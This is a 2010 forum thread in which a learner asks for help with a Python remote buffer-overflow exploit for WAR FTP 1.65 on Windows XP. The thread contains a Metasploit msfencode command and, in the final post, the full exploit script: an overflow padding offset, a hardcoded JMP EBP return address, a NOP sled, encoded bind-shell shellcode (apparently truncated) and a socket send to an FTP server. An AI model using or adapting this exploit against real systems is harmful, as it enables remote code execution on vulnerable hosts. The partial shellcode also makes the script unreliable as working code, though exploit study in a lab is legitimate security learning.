Frustrated with Shellcode

N3WB134444

Newbie

Posts: 5

Joined: Mon Jun 21, 2010 7:55 am

Post Mon Jun 21, 2010 8:22 am

Frustrated with Shellcode

I started coding the WAR FTP 1.65 Remote Code exploit in Python to exploit a Win XP SP2 machine this morning and it's still not finished :(. It went fine up until the point that shellcode had to be added.

I managed to overwrite EIP with my A's and eventually with a JMP EBP from my USER32.dll file and even managed to put in my breakpoints where my shellcode was supposed to go; everything worked with OllyDbg. But I kept failing at the shellcode which I generated with msfpayload. I spent the rest of the day playing around with different shellcodes trying to get the blasted thing to work. I played with different connecting shellcodes, VNC injects, encoders and even filtering out bad characters, padding with NOPs, and the blasted thing still wouldn't work.

Could anybody please provide me with any tips for shellcode? I understand the difference between types of shells, e.g. bind and reverse, but the different encoders are throwing me off. Could I have just missed a bad character somewhere? Any help would be much appreciated, thanks :)

n1p

Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Wed Jun 23, 2010 3:37 pm

Re: Frustrated with Shellcode

Better late than never ;) I normally use the alpha_upper encoder, which should remove bad characters. I remember having problems with the shikata_ga_nai encoder and removing bad characters whilst exploiting a program previously.

msfencode -e x86/alpha_upper -t c

Paste that into your exploit code and see. Also happy to look at your code if necessary.

http://seclists.org/metasploit/2006/q4/51 - possibly related

cheers
Last edited by n1p on Wed Jun 23, 2010 3:46 pm, edited 1 time in total.
N3WB134444

Newbie

Posts: 5

Joined: Mon Jun 21, 2010 7:55 am

Post Thu Jun 24, 2010 4:39 am

Re: Frustrated with Shellcode

Thanks very much for your help and reply. I will give it a go and let you know how it turns out.

Cheers
n1p

Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Jun 24, 2010 3:21 pm

Re: Frustrated with Shellcode

No problem, do let us know how it turns out :P

N3WB134444

Newbie

Posts: 5

Joined: Mon Jun 21, 2010 7:55 am

Post Fri Jun 25, 2010 5:04 am

Re: Frustrated with Shellcode

Well, I tried alpha_upper encoding, reviewed my code and couldn't see anything that terminates the string, so here is my code.

EIP was overwritten at the 476th byte.

I used JMP EBP, which I discovered in USER32.dll as it had more room for shellcode.

I used a ./msfpayload windows/shell_bind_tcp payload with the x86/alpha encoder.

Any insight that you could provide would be most appreciated, thanks.

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell = ("\x89\xe6\xd9\xc3\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x41\x41")
ret = "\x32\xa4\xd5\x77"
# EBP ADDRESS 77D5A432
buffer = '\x41' * 476 + ret + '\x90' * 16 + '\x90' * 16 + shell
print "\nSending evil buffer..."
s.connect(('10.16.250.4', 21))
data = s.recv(1024)
s.send('USER anonymous' + buffer + '\r\n')
data = s.recv(1024)
s.close()
